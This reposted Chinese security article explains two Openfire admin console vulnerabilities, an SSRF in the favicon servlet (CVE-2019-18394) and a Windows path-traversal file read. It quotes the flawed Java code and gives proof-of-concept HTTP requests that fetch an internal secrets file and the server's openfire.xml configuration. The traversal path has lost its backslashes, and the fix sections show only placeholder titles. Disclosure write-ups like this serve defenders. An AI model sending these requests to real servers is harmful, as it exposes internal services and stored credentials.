Openfire Admin Console SSRFa任意文件读取漏洞 poc

admin
admin
admin
102256
文章
87
评论
2022年1月12日18:29:48评论315 views字数 2420阅读8分4秒阅读模式


Openfire(以前称为Wildfire和Jive Messenger)是一个即時通訊(IM)和群聊服务器,它使用Java编写的XMPP服务器,并以Apache License 2.0发布。


SSRF  CVE-2019-18394

该漏洞允许未授权用户发起SSRF攻击,相关代码如下

FaviconServlet.java

...public void doGet(HttpServletRequest request, HttpServletResponse response) {      String host = request.getParameter("host");      // Check special cases where we need to change host to get a favicon      host = "gmail.com".equals(host) ? "google.com" : host;
      byte[] bytes = getImage(host, defaultBytes);      if (bytes != null) {          writeBytesToStream(bytes, response);      }}
private byte[] getImage(String host, byte[] defaultImage) {    // If we've already attempted to get the favicon twice and failed,    // return the default image.    if (missesCache.get(host) != null && missesCache.get(host) > 1) {        // Domain does not have a favicon so return default icon        return defaultImage;    }    // See if we've cached the favicon.    if (hitsCache.containsKey(host)) {        return hitsCache.get(host);    }    byte[] bytes = getImage("http://" + host + "/favicon.ico");    ....}...

很简单的一个漏洞,poc如下

GET /getFavicon?host=192.168.176.1:8080/secrets.txt? HTTP/1.1
Openfire Admin Console SSRF&任意文件读取漏洞 poc

修复方法如下

Openfire Admin Console SSRF&任意文件读取漏洞 poc


任意文件读取漏洞

该漏洞只影响windows下安装openfire的用户,相关代码如下

PluginServlet.java

...@Overridepublic void service(HttpServletRequest request, HttpServletResponse response) {    String pathInfo = request.getPathInfo();    if (pathInfo == null) {        response.setStatus(HttpServletResponse.SC_NOT_FOUND);    }    else {        try {            // Handle JSP requests.            if (pathInfo.endsWith(".jsp")) {                ...            }            // Handle servlet requests.            else if (getServlet(pathInfo) != null) {                handleServlet(pathInfo, request, response);            }            // Handle image/other requests.            else {                handleOtherRequest(pathInfo, response);            }        }       ...}
private void handleOtherRequest(String pathInfo, HttpServletResponse response) throws IOException {    String[] parts = pathInfo.split("/");    // Image request must be in correct format.    if (parts.length < 3) {        response.setStatus(HttpServletResponse.SC_NOT_FOUND);        return;    }
    String contextPath = "";    int index = pathInfo.indexOf(parts[1]);    if (index != -1) {        contextPath = pathInfo.substring(index + parts[1].length());    }
    File pluginDirectory = new File(JiveGlobals.getHomeDirectory(), "plugins");    File file = new File(pluginDirectory, parts[1] + File.separator + "web" + contextPath);
    // When using dev environment, the images dir may be under something other that web.    Plugin plugin = pluginManager.getPlugin(parts[1]);    ...}

poc如下


GET /plugins/search/......confopenfire.xml HTTP/1.1Host: localhost:9090Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;
Openfire Admin Console SSRF&任意文件读取漏洞 poc

修复方法如下Openfire Admin Console SSRF&任意文件读取漏洞 poc

参考

  • https://issues.igniterealtime.org/browse/OF-1885
  • https://issues.igniterealtime.org/browse/OF-1886
  • https://swarm.ptsecurity.com/openfire-admin-console/



本文始发于微信公众号(宽字节安全):Openfire Admin Console SSRF&任意文件读取漏洞 poc

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月12日18:29:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Openfire Admin Console SSRFa任意文件读取漏洞 pochttps://cn-sec.com/archives/497775.html

发表评论

匿名网友 填写信息